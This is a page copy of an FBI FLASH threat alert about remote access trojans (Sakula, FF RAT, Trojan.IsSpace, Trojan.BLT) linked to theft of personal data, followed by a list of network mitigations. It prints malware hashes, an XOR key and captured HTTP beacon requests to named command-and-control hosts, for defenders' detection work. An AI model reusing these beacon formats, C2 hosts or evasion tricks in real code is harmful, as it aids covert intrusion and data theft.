SlideShare a Scribd company logo
TLP: GREEN
The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with
the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607
TLP: GREEN
05 June 2015
Alert Number
A-000061-MW
Please contact the FBI with
any questions related to this
FLASH Report at either your
local Cyber Task Force or
FBI CYWATCH.
Email:
cywatch@ic.fbi.gov
Phone:
1-855-292-3937
Local Field Offices:
www.fbi.gov/contact-us/field
In furtherance of public-private partnerships, the FBI routinely advises
private industry of various cyber threat indicators observed during the
course of our investigations. This data is provided in order to help cyber
security professionals and system administrators to guard against the
persistent malicious actions of cyber criminals.
This FLASH has been released TLP: GREEN: The information in this product is
useful for the awareness of all participating organizations as well as with
peers within the broader community or sector. Recipients may share this
information with peers and partner organizations within their sector or
community, but not via publicly accessible channels.
Summary
The FBI is providing the following information with HIGH confidence:
The FBI has obtained information regarding cyber actors who have compromised
and stolen sensitive business information and Personally Identifiable Information
(PII). Information obtained from victims indicates that PII was a priority target.
The FBI notes that stolen PII has been used in other instances to target or
otherwise facilitate various malicious activities such as financial fraud though the
FBI is not aware of such activity by these groups. Any activity related to these
groups detected on a network should be considered an indication of a compromise
requiring extensive mitigation and contact with law enforcement.
Technical Details
The FBI is providing the following information with HIGH confidence:
Groups responsible for these activities have been observed across a variety of
intrusions leveraging a diverse selection of tools and techniques to attempt to gain
initial access to a victim including using credentials acquired during previous
intrusions. These groups have also been observed compromising using the
technique of DNS hijacking facilitated through the compromise of DNS registrars.
TLP: GREEN
Federal Bureau of Investigation, Cyber Division
FLASH NOTIFICATION
The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with
the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607
TLP: GREEN
Following such an exploit, such groups have been observed recently using custom Remote Access Tools (RAT).
Sakula- A RAT that has the capabilities to launch remote command shells, enumerate processes, download files, and
beacon to Command and Control (C2) domains. Sakula attempts to send a two-beacon set over TCP port 80 to a
configured domain. If the domain is unavailable, it will attempt to connect to a secondary domain over TCP port 80 and
443 using HTTP.
Specific Sakula MD5 hash values are attached in the accompanying Excel spreadsheet.
Beaconing
POST /script.asp?imageid=ivpgvz2085205250&type=0&resid=93863828&nmsg=up HTTP/1.1
Accept: */*
User-Agent: iexplorer
Host: [varies]
Content-Length: 173
Cache-Control: no-cache
GET /photo/ivpgvz2085205250.jpg?resid=93864218 HTTP/1.1
User-Agent: iexplorer
Host: [varies]
Cache-Control: no-cache
The following are example POST and GET requests to the secondary C2 domain
GET /newimage.asp?imageid=
POST /view.asp?cstring=
POST /view.asp?cstring=%s&tom=0&id=
POST /script.asp?imageid=
GET /photo/%s.jpg?id=%d
POST /viewpre.asp?cstring=
User-Agent: HttpDump 1.1
POST /script.asp?imageid=ivpgvz2085205250&type=0&resid=100391156&nmsg=up HTTP/1.1
Accept: */*
User-Agent: iexplorer
Host: [varies]
Content-Length: 173
Cache-Control: no-cache
GET /photo/ivpgvz2085205250.jpg?resid=100391156 HTTP/1.1
User-Agent: iexplorer
Host: [varies]
TLP: GREEN
Federal Bureau of Investigation, Cyber Division
FLASH NOTIFICATION
The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with
the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607
TLP: GREEN
FF RAT- a RAT that has the capabilities to download Trojan DLL files to memory and beacon back to C2 domains and
was named based on the unique string “FF-RAT USER” found within the malware. The data sent in the beacon is XOR-
encoded using the key 0x27.
Trojan.IsSpace - a RAT that contains multiple files that include a dropper (EWSNH.exe), Trojan (AOFVPMJXVT.exe),
privilege escalation tool (SensrSvc2013.exe), and a module used by the tool (SensrSvc2013.dll). This malware is capable
of bypassing dyndns categorization by using a proxy through Google AppProxy’s hosted on appspot domains.
Filename: EWSNH.exe
MD5: bfdbf09072b58e90aef726c2d1ecf8b7
File Size (bytes): 1990136
Filename: AOFVPMJXVT.exe
MD5: 25631f5ccec8f155a8760b8568ca22c5
File Size (bytes): 63488
Filename: SensrSvc2013.exe
MD5: 38f29e955b76de69c8e97f4491202b8b
File Size (bytes): 197120
Filename: <VARIES>.tmp / SensrSvc2013.dll / CRYPTBASE.dll
MD5: 75416711fc782a3e2a2b54c4b86677bf
File Size (bytes): 42496
Protocol variations in the URI:
SSports.asp?
HostID=
SWeather.asp?
HostID=
&PackNo=
SJobs.asp?HostID=
STravel.asp?HostID=
SGames.asp?
HostID=
SNews.asp?HostID=
STTip.asp
Trojan.BLT- a RAT that is executed from its export CreateInstance, the mutex HFRM_ is created and a process instance
of cmd.exe is launched to execute the command “ipconfig/all” to collect the victim system’s MAC address. Trojan.BLT
will test network connectivity by establishing a connection with a legitimate website. This malware is capable of
bypassing dyndns categorization by using a proxy through Google AppProxy’s hosted on appspot domains.
Trojan.BLT will validate the connection by checking the HTTP header “Service:IIS”. Trojan.BLT will then conduct further
C2 activity.
TLP: GREEN
Federal Bureau of Investigation, Cyber Division
FLASH NOTIFICATION
The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with
the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607
TLP: GREEN
Beaconing:
POST /fetch.py HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: snecma-secure.appspot.com
Content-Length: 56
Connection: Close
POST /asp/STTip.asp HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: facebook.from-pr.com
Content-Length: 11
Connection: Close
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)
Host: www.microsoft.com
Cache-Control: no-cache
Recommended Mitigations
The FBI is providing the following information with HIGH confidence:
The FBI and NSA recommend the following mitigation measures be taken within the first 72 hours of detection:
Prepare Your Environment for Incident Response
• Establish Out-of-Band Communications methods for dissemination of intrusion response plans and activities,
inform NOCs/CERTs according to institutional policy and SOPs
ensuring that all devices
have logging enabled and their logs are being aggregated to those centralized solutions
• Disable all remote (including RDP & VPN) access until a password change has been completed
• Implement full SSL/TLS inspection capability (on perimeter and proxy devices)
• Monitor accounts and devices determined to be part of the compromise to prevent reacquisition attempts
Implement core mitigations to inhibit re-exploitation (within 72 hours)
Implement a network-wide password reset (preferably with local host access only, no remote changes allowed) to
include:
TLP: GREEN
Federal Bureau of Investigation, Cyber Division
FLASH NOTIFICATION
The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with
the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607
TLP: GREEN
• All domain accounts (especially high-privileged administrators)
• Local Accounts
• Machine and System Accounts
Patch all systems for critical vulnerabilities:
A patch management process that regularly patches vulnerable software remains a critical component in raising the
difficulty of intrusions for cyber operators. While a few adversaries use zero-day exploits to target victims, many
adversaries still target known vulnerabilities for which patches have been released, capitalizing on slow patch
processes and risk decisions by network owners not to patch certain vulnerabilities or systems.
After initial response activities, deploy and correctly configure Microsoft's Enhanced Mitigation Experience Toolkit
(EMET). EMET employs several mitigations techniques to combat memory corruption techniques. It is recommended
that all hosts and servers on the network implement EMET, but for recommendations on the best methodology to
employ when deploying EMET, please see NSA/IAD's Anti-Exploitation Slicksheet -
https://www.nsa.gov/ia/_files/factsheets/I43V_Slick_Sheets/Slicksheet_AntiExploitationFeatures_Web.pdf
Implement Data-At-Rest (DAR) Protections.
 The goal for DAR protections is to prevent an attacker from compromising sensitive data when the End User
Device (EUD) is powered off or unauthenticated.
 The use of multiple encryption layers that meet IAD and CNSSP-15 guidance, implemented with
components meeting the Commercial Solution for Classified (CSfC) vendor diversity requirements,
reduces the likelihood that a single vulnerability or failure can be exploited to compromise EUDs, move
laterally through a network, and access sensitive data.
 Receiving and validating updates or code patches for these components only through direct physical
administration or an NSA approved Data in Transit (DIT) solution mitigates the threat of malicious
attempts to push unverified updates or code updates.
 Procure products that have been validated through NIAP’s DAR Protection Profiles (PPs) and utilize the DAR
Capability Package (CP) that provides configurations allowing customers to independently implement
secure solutions using layered Commercial Off-the-Shelf (COTS) products. The CP is vendor-agnostic and
provides high-level security and configuration guidance for customers and/or Solution Integrators.
Implement long-term mitigations to further harden systems
1. Protect Credentials: By implementing the following credential protections, the threat actor’s ability to gain
highly privileged account access and move throughout a network is severely hampered.
a. Implement Least Privilege: Least privilege is the limiting of rights assigned to each group of
accounts on a network to only the rights required for the user, as in a normal user is only granted
user level privileges and cannot perform any administrative tasks such as installing software.
b. Restrict Local Accounts: By restricting the usage of local accounts, especially local administer
accounts, you are able to reduce the amount of usable credentials found within a network. When
utilizing local accounts, passwords and their corresponding hashes are stored on the host and are
TLP: GREEN
Federal Bureau of Investigation, Cyber Division
FLASH NOTIFICATION
The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with
the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607
TLP: GREEN
more readily available for harvesting by an adversary who seeks to establish persistence.
Adversaries are known to use this information to move across the network through Pass the Hash.
c. Limit lateral movement: This mitigation reduces the adversary’s ability to go from exploiting one
machine to taking over the entire network. Host firewall rules, Active Directory structuring, and/or
Group Policy settings, can be tailored to stop communications between systems and increase the
survivability and defensibility of a network under attack.
d. Admin Access Segregation: Once an adversary gains administrator credentials, especially domain
administrator credentials, the network becomes wide open to their malicious activity. By
decreasing the surface area where admin credentials can be stolen, through restricting where
administrators can use their accounts and what they can use their accounts for, the threat actor
will have a much harder time fully compromising a network.
e. Log and Monitor Privileged Admin Account Usage: Implementing logging and monitoring
capabilities on privileged accounts can provide insight to system owners and incident response
professionals of account misuse and potential compromise by malicious actors. For instance it may
be discovered that a domain admin is logging in at 2200 every night even though that admin is
done working for the day and gone from the building. This mitigation would also enable discovery
of any privileged admin accounts that were created by the actor for persistence.
2. Segregate Networks and Functions:
a. DMZ Isolation: By ensuring that the DMZ is properly segregated both through physical and logical
network architecture and admin/user accounts, a network owner can greatly decrease the
external attack surface. Since webservers and corresponding databases usually sit in this location
and are also externally accessible, they regularly are the first target during CNO. If these systems
are compromised and the DMZ is not configured properly or at all, it could mean the loss of the
entire enterprise.
b. Network Function Segregation: A network owner should implement a tiered system when
determining the switching within a network. This way the lower security systems, like user
workstations or machines with email and internet access, cannot insecurely communicate with
higher security systems like domain controllers and other member servers. This can be achieved
through multiple methods including VLANs, physical network topologies, and Firewall rule sets. In
the same vein, networks need to apply the same segregation principle to the various tiers of
accounts within a network, ensuring highly privileged accounts cannot access lower security tiered
systems and low privilege accounts cannot access higher security tiered systems.
c. Perimeter Filtering: Perimeter filtering refers to properly implementing network security devices,
such as proxies, firewall, web content filters, and IDS/IPS. The intent is to block malicious traffic
from reaching a user’s machine and provide protection against data exfiltration and command and
control.
3. Implement Application Whitelisting: Application whitelisting is the configuring of host system to only
execute a specific, known set of code. Basically, if a program or executable code, such as a piece of
malware, is not included in the whitelist it’s never allowed to run.
4. Install and correctly use EMET: One of the frequently used tactics by an adversary is to initially infect a
host through spear-phishing and drive-by’s/water-holing websites. The best way to counter this initial
exploitation is through the implementation of an anti-exploitation tool, such as Microsoft’s Enhanced
Mitigation Experience Toolkit (EMET). These tools can render useless entire classes of malware and
malicious TTP instead of eliminating one piece of malware at a time; an enormous boon to a network’s
security.
TLP: GREEN
Federal Bureau of Investigation, Cyber Division
FLASH NOTIFICATION
The information in this FLASH was obtained through an FBI investigation and is provided in conjunction with
the FBI’s statutory requirement to conduct victim notification as outlined in 42 USC § 10607
TLP: GREEN
5. Use a Standard Baseline: Implementing a uniform image with security already baked in and standardized
applications affords the incident response team the ability to look at exploited machines and distinguish
what is malicious vs. allowed. It also ensures that each machine on network is at least at a certain level of
security prior to further customization for a user’s needs. Within the DoDIN this can be satisfied through
the Unified Master Gold Disk, maintained and distributed through DISA.
6. Centralize logging of all events: By pulling all of the system logs, such as Windows Event or Error logs, and
any logs from security devices, such as SNORT or firewall rule hits, into a centralized location, the network
admin and intrusion response team would be able to more efficiently detect and understand the tools,
tactics, and procedures of the adversary. Using this information then increases the responder’s ability to
effectively corner and expel the adversary.
7. Data-at-Rest and Data-in-Transit Encryption: Implementing encryption for both data at rest and data in
transit ensures that what is meant to be kept private stays private, whether it is stored on a disk or moving
across a network. It means that exfiltration and espionage attempts can be thwarted since a threat actor
cannot access the information.
Additional guidance to follow can be found at the following:
Implement Pass-the-Hash mitigations. For more information, please see the NSA/IAD Publication Reducing the
Effectiveness of Pass-the-Hash at - http://www.nsa.gov/ia/_files/app/Reducing_the_Effectiveness_of_Pass-the-
Hash.pdf
Baseline File Systems and Accounts in preparation for Whitelisting implementation. Consider using a Secure Host
Baseline. See NSA/IAD's guidance at
https://www.nsa.gov/ia/_files/factsheets/I43V_Slick_Sheets/Slicksheet_SecureHostBaseline_Print.pdf
Deploy, configure and monitor Application Whitelisting. For detailed guidance, please see NSA/IAD's Application
Whitelisting Slicksheet at –
https://www.nsa.gov/ia/_files/factsheets/i43v_slick_sheets/slicksheet_applicationwhitelisting_standard.pdf
POINT OF CONTACT
- In furtherance of public-private partnerships, the FBI routinely advises private industry of various cyber
threat indicators observed during the course of our investigations. This data is provided in order to help
cyber security professionals and system administrators to guard against the persistent malicious actions of
cyber criminals.
- The FBI encourages recipients who identify the use of tool(s) or techniques discussed in this document to
report information to their local FBI field office or the FBI’s 24/7 Cyber Watch. Field office contacts can be
identified at www.fbi.gov/contact-us/field. CyWatch can be contacted by phone at 855-292-3937 or by e-
mail at cywatch@ic.fbi.gov.
- Press inquiries should be directed to the FBI’s National Press Office at npo@ic.fbi.gov or 202-324-3691.

More Related Content

What's hot

Talk28oct14
Talk28oct14Talk28oct14
Talk28oct14
mjos
 
File000143
File000143File000143
File000143
Desmond Devendran
 
Web hacking 1.0
Web hacking 1.0Web hacking 1.0
Web hacking 1.0
Q Fadlan
 
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Syed Ubaid Ali Jafri
 
A Taxonomy of Botnet Detection Approaches
A Taxonomy of Botnet Detection ApproachesA Taxonomy of Botnet Detection Approaches
A Taxonomy of Botnet Detection Approaches
Fabrizio Farinacci
 
Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7
Jesse Burke
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilities
Vi Tính Hoàng Nam
 
Ceh v5 module 06 trojans and backdoors
Ceh v5 module 06 trojans and backdoorsCeh v5 module 06 trojans and backdoors
Ceh v5 module 06 trojans and backdoors
Vi Tính Hoàng Nam
 
CYBER ATTACKS ON GEORGIAN GOVERNMENTAL RESOURCES - Zurab Akhvlediani
CYBER ATTACKS ON GEORGIAN GOVERNMENTAL RESOURCES - Zurab AkhvledianiCYBER ATTACKS ON GEORGIAN GOVERNMENTAL RESOURCES - Zurab Akhvlediani
CYBER ATTACKS ON GEORGIAN GOVERNMENTAL RESOURCES - Zurab Akhvlediani
DataExchangeAgency
 
Soho routers: swords and shields CyberCamp 2015
Soho routers: swords and shields   CyberCamp 2015Soho routers: swords and shields   CyberCamp 2015
Soho routers: swords and shields CyberCamp 2015
Iván Sanz de Castro
 
Ids
IdsIds
Hacking - penetration tools
Hacking - penetration toolsHacking - penetration tools
Hacking - penetration tools
JenishChauhan4
 
License
LicenseLicense
License
rikiviji
 
Making Threat Management More Manageable
Making Threat Management More ManageableMaking Threat Management More Manageable
Making Threat Management More Manageable
IBM Security
 
The ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT PlaybookThe ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT Playbook
MITRE ATT&CK
 
File000149
File000149File000149
File000149
Desmond Devendran
 
Ce hv6 module 52 hacking rss and atom
Ce hv6 module 52 hacking rss and atomCe hv6 module 52 hacking rss and atom
Ce hv6 module 52 hacking rss and atom
Vi Tính Hoàng Nam
 
Presentation1
Presentation1Presentation1
Presentation1
Abhishek Malhotra
 
Net Defender
Net DefenderNet Defender
Net Defender
krishna maddikara
 
Cyber securityppt
Cyber securitypptCyber securityppt
Cyber securityppt
Sachin Roy
 

What's hot (20)

Talk28oct14
Talk28oct14Talk28oct14
Talk28oct14
 
File000143
File000143File000143
File000143
 
Web hacking 1.0
Web hacking 1.0Web hacking 1.0
Web hacking 1.0
 
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
Securing PoS Terminal - A Technical Guideline on Securing PoS System From Hac...
 
A Taxonomy of Botnet Detection Approaches
A Taxonomy of Botnet Detection ApproachesA Taxonomy of Botnet Detection Approaches
A Taxonomy of Botnet Detection Approaches
 
Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7Jesse Burke RDPwned HackMiami7
Jesse Burke RDPwned HackMiami7
 
Ceh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilitiesCeh v5 module 12 web application vulnerabilities
Ceh v5 module 12 web application vulnerabilities
 
Ceh v5 module 06 trojans and backdoors
Ceh v5 module 06 trojans and backdoorsCeh v5 module 06 trojans and backdoors
Ceh v5 module 06 trojans and backdoors
 
CYBER ATTACKS ON GEORGIAN GOVERNMENTAL RESOURCES - Zurab Akhvlediani
CYBER ATTACKS ON GEORGIAN GOVERNMENTAL RESOURCES - Zurab AkhvledianiCYBER ATTACKS ON GEORGIAN GOVERNMENTAL RESOURCES - Zurab Akhvlediani
CYBER ATTACKS ON GEORGIAN GOVERNMENTAL RESOURCES - Zurab Akhvlediani
 
Soho routers: swords and shields CyberCamp 2015
Soho routers: swords and shields   CyberCamp 2015Soho routers: swords and shields   CyberCamp 2015
Soho routers: swords and shields CyberCamp 2015
 
Ids
IdsIds
Ids
 
Hacking - penetration tools
Hacking - penetration toolsHacking - penetration tools
Hacking - penetration tools
 
License
LicenseLicense
License
 
Making Threat Management More Manageable
Making Threat Management More ManageableMaking Threat Management More Manageable
Making Threat Management More Manageable
 
The ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT PlaybookThe ATT&CK Latin American APT Playbook
The ATT&CK Latin American APT Playbook
 
File000149
File000149File000149
File000149
 
Ce hv6 module 52 hacking rss and atom
Ce hv6 module 52 hacking rss and atomCe hv6 module 52 hacking rss and atom
Ce hv6 module 52 hacking rss and atom
 
Presentation1
Presentation1Presentation1
Presentation1
 
Net Defender
Net DefenderNet Defender
Net Defender
 
Cyber securityppt
Cyber securitypptCyber securityppt
Cyber securityppt
 

Viewers also liked

Anonymous hacks wto, leaks personal data of thousands of officials
Anonymous hacks wto, leaks personal data of thousands of officialsAnonymous hacks wto, leaks personal data of thousands of officials
Anonymous hacks wto, leaks personal data of thousands of officials
RepentSinner
 
#Op exposecps roz mcallister shill informant d0x
#Op exposecps roz mcallister shill informant d0x#Op exposecps roz mcallister shill informant d0x
#Op exposecps roz mcallister shill informant d0x
RepentSinner
 
Malaysia airlines flight mh 370 passenger manifest
Malaysia airlines flight mh 370 passenger manifestMalaysia airlines flight mh 370 passenger manifest
Malaysia airlines flight mh 370 passenger manifestRepentSinner
 
Obama suspicious death lists ... body counts
Obama suspicious death lists ... body countsObama suspicious death lists ... body counts
Obama suspicious death lists ... body counts
RepentSinner
 
Dni james clapper financial disclosure
Dni james clapper financial disclosureDni james clapper financial disclosure
Dni james clapper financial disclosure
RepentSinner
 
Transcript of-hearing-5-29-15
Transcript of-hearing-5-29-15Transcript of-hearing-5-29-15
Transcript of-hearing-5-29-15
RepentSinner
 
Federal order-on-hogans-motion-for-a-preliminary
Federal order-on-hogans-motion-for-a-preliminaryFederal order-on-hogans-motion-for-a-preliminary
Federal order-on-hogans-motion-for-a-preliminary
RepentSinner
 
Do d joint reserve spying program dodi 3325-11
Do d joint reserve spying program dodi 3325-11Do d joint reserve spying program dodi 3325-11
Do d joint reserve spying program dodi 3325-11
RepentSinner
 
Nat secadvisor susan rice financial disclosure
Nat secadvisor susan rice financial disclosureNat secadvisor susan rice financial disclosure
Nat secadvisor susan rice financial disclosure
RepentSinner
 
Report of the detailed findings of the commission of inquiry on the 2014 gaza...
Report of the detailed findings of the commission of inquiry on the 2014 gaza...Report of the detailed findings of the commission of inquiry on the 2014 gaza...
Report of the detailed findings of the commission of inquiry on the 2014 gaza...
RepentSinner
 
American dreaming from g1 to bilderberg
American dreaming   from g1 to bilderbergAmerican dreaming   from g1 to bilderberg
American dreaming from g1 to bilderberg
RepentSinner
 
Order 7610 military-handling-hijacked-acft
Order 7610 military-handling-hijacked-acftOrder 7610 military-handling-hijacked-acft
Order 7610 military-handling-hijacked-acft
RepentSinner
 
The rothschilds news followup
The rothschilds  news followupThe rothschilds  news followup
The rothschilds news followup
RepentSinner
 
Gawkers statement-of-undisputed-material-facts
Gawkers statement-of-undisputed-material-factsGawkers statement-of-undisputed-material-facts
Gawkers statement-of-undisputed-material-facts
RepentSinner
 
2015 bilderberg meeting participant list
2015 bilderberg meeting participant list2015 bilderberg meeting participant list
2015 bilderberg meeting participant list
RepentSinner
 
Hogans federal-motion-for-a-preliminary-injunction
Hogans federal-motion-for-a-preliminary-injunctionHogans federal-motion-for-a-preliminary-injunction
Hogans federal-motion-for-a-preliminary-injunction
RepentSinner
 
Bis rfc export riot control technology software
Bis rfc export riot control technology softwareBis rfc export riot control technology software
Bis rfc export riot control technology software
RepentSinner
 

Viewers also liked (17)

Anonymous hacks wto, leaks personal data of thousands of officials
Anonymous hacks wto, leaks personal data of thousands of officialsAnonymous hacks wto, leaks personal data of thousands of officials
Anonymous hacks wto, leaks personal data of thousands of officials
 
#Op exposecps roz mcallister shill informant d0x
#Op exposecps roz mcallister shill informant d0x#Op exposecps roz mcallister shill informant d0x
#Op exposecps roz mcallister shill informant d0x
 
Malaysia airlines flight mh 370 passenger manifest
Malaysia airlines flight mh 370 passenger manifestMalaysia airlines flight mh 370 passenger manifest
Malaysia airlines flight mh 370 passenger manifest
 
Obama suspicious death lists ... body counts
Obama suspicious death lists ... body countsObama suspicious death lists ... body counts
Obama suspicious death lists ... body counts
 
Dni james clapper financial disclosure
Dni james clapper financial disclosureDni james clapper financial disclosure
Dni james clapper financial disclosure
 
Transcript of-hearing-5-29-15
Transcript of-hearing-5-29-15Transcript of-hearing-5-29-15
Transcript of-hearing-5-29-15
 
Federal order-on-hogans-motion-for-a-preliminary
Federal order-on-hogans-motion-for-a-preliminaryFederal order-on-hogans-motion-for-a-preliminary
Federal order-on-hogans-motion-for-a-preliminary
 
Do d joint reserve spying program dodi 3325-11
Do d joint reserve spying program dodi 3325-11Do d joint reserve spying program dodi 3325-11
Do d joint reserve spying program dodi 3325-11
 
Nat secadvisor susan rice financial disclosure
Nat secadvisor susan rice financial disclosureNat secadvisor susan rice financial disclosure
Nat secadvisor susan rice financial disclosure
 
Report of the detailed findings of the commission of inquiry on the 2014 gaza...
Report of the detailed findings of the commission of inquiry on the 2014 gaza...Report of the detailed findings of the commission of inquiry on the 2014 gaza...
Report of the detailed findings of the commission of inquiry on the 2014 gaza...
 
American dreaming from g1 to bilderberg
American dreaming   from g1 to bilderbergAmerican dreaming   from g1 to bilderberg
American dreaming from g1 to bilderberg
 
Order 7610 military-handling-hijacked-acft
Order 7610 military-handling-hijacked-acftOrder 7610 military-handling-hijacked-acft
Order 7610 military-handling-hijacked-acft
 
The rothschilds news followup
The rothschilds  news followupThe rothschilds  news followup
The rothschilds news followup
 
Gawkers statement-of-undisputed-material-facts
Gawkers statement-of-undisputed-material-factsGawkers statement-of-undisputed-material-facts
Gawkers statement-of-undisputed-material-facts
 
2015 bilderberg meeting participant list
2015 bilderberg meeting participant list2015 bilderberg meeting participant list
2015 bilderberg meeting participant list
 
Hogans federal-motion-for-a-preliminary-injunction
Hogans federal-motion-for-a-preliminary-injunctionHogans federal-motion-for-a-preliminary-injunction
Hogans federal-motion-for-a-preliminary-injunction
 
Bis rfc export riot control technology software
Bis rfc export riot control technology softwareBis rfc export riot control technology software
Bis rfc export riot control technology software
 

Similar to Fbi cyber division bulletin on tools reportedly used by opm hackers

Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.
Travis
 
UNIT-4.docx
UNIT-4.docxUNIT-4.docx
UNIT-4.docx
CSEA18Arun537
 
Firewall presentation
Firewall presentationFirewall presentation
Firewall presentation
gaurav96raj
 
Netdefender
NetdefenderNetdefender
Netdefender
krishna Maddikara
 
Detect Threats Faster
Detect Threats FasterDetect Threats Faster
Detect Threats Faster
Force 3
 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guide
Darin Fredde
 
Discover How Your Company's Firewall is Susceptible to Hacking.pdf
Discover How Your Company's Firewall is Susceptible to Hacking.pdfDiscover How Your Company's Firewall is Susceptible to Hacking.pdf
Discover How Your Company's Firewall is Susceptible to Hacking.pdf
IT AMC Support Dubai - Techno Edge Systems LLC
 
Firewalls
FirewallsFirewalls
Firewalls
Deevena Dayaal
 
4777.team c.final
4777.team c.final4777.team c.final
4777.team c.final
AlexisHarvey8
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
belsis
 
Incident Response: Validation, Containment & Forensics
 Incident Response: Validation, Containment & Forensics Incident Response: Validation, Containment & Forensics
Incident Response: Validation, Containment & Forensics
Priyanka Aash
 
Cyber Crime Multi-State Information Sharing and Analysis Center
Cyber Crime Multi-State Information Sharing and Analysis CenterCyber Crime Multi-State Information Sharing and Analysis Center
Cyber Crime Multi-State Information Sharing and Analysis Center
- Mark - Fullbright
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.ppt
shreyng
 
Security and Ethical Challenges Contributors Kim Wanders.docx
Security and Ethical Challenges  Contributors Kim Wanders.docxSecurity and Ethical Challenges  Contributors Kim Wanders.docx
Security and Ethical Challenges Contributors Kim Wanders.docx
edgar6wallace88877
 
Security and Ethical Challenges Contributors Kim Wanders.docx
Security and Ethical Challenges  Contributors Kim Wanders.docxSecurity and Ethical Challenges  Contributors Kim Wanders.docx
Security and Ethical Challenges Contributors Kim Wanders.docx
fathwaitewalter
 
Network Security & Ethical Hacking
Network Security & Ethical HackingNetwork Security & Ethical Hacking
Network Security & Ethical Hacking
Sripati Mahapatra
 
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
MohamedOmerMusa
 
Final Project – Incident Response Exercise SAMPLE.docx
Final Project – Incident Response Exercise SAMPLE.docxFinal Project – Incident Response Exercise SAMPLE.docx
Final Project – Incident Response Exercise SAMPLE.docx
lmelaine
 
Firewall
FirewallFirewall
Firewall
thinkahead.net
 
IDS+Honeypots Making Security Simple
IDS+Honeypots Making Security SimpleIDS+Honeypots Making Security Simple
IDS+Honeypots Making Security Simple
Gregory Hanis
 

Similar to Fbi cyber division bulletin on tools reportedly used by opm hackers (20)

Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.Infragard HiKit FLASH Alert.
Infragard HiKit FLASH Alert.
 
UNIT-4.docx
UNIT-4.docxUNIT-4.docx
UNIT-4.docx
 
Firewall presentation
Firewall presentationFirewall presentation
Firewall presentation
 
Netdefender
NetdefenderNetdefender
Netdefender
 
Detect Threats Faster
Detect Threats FasterDetect Threats Faster
Detect Threats Faster
 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guide
 
Discover How Your Company's Firewall is Susceptible to Hacking.pdf
Discover How Your Company's Firewall is Susceptible to Hacking.pdfDiscover How Your Company's Firewall is Susceptible to Hacking.pdf
Discover How Your Company's Firewall is Susceptible to Hacking.pdf
 
Firewalls
FirewallsFirewalls
Firewalls
 
4777.team c.final
4777.team c.final4777.team c.final
4777.team c.final
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
Incident Response: Validation, Containment & Forensics
 Incident Response: Validation, Containment & Forensics Incident Response: Validation, Containment & Forensics
Incident Response: Validation, Containment & Forensics
 
Cyber Crime Multi-State Information Sharing and Analysis Center
Cyber Crime Multi-State Information Sharing and Analysis CenterCyber Crime Multi-State Information Sharing and Analysis Center
Cyber Crime Multi-State Information Sharing and Analysis Center
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.ppt
 
Security and Ethical Challenges Contributors Kim Wanders.docx
Security and Ethical Challenges  Contributors Kim Wanders.docxSecurity and Ethical Challenges  Contributors Kim Wanders.docx
Security and Ethical Challenges Contributors Kim Wanders.docx
 
Security and Ethical Challenges Contributors Kim Wanders.docx
Security and Ethical Challenges  Contributors Kim Wanders.docxSecurity and Ethical Challenges  Contributors Kim Wanders.docx
Security and Ethical Challenges Contributors Kim Wanders.docx
 
Network Security & Ethical Hacking
Network Security & Ethical HackingNetwork Security & Ethical Hacking
Network Security & Ethical Hacking
 
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...Trial Course - CertMaster Learn and CertMaster Labs for Security+ (Exam SY0-6...
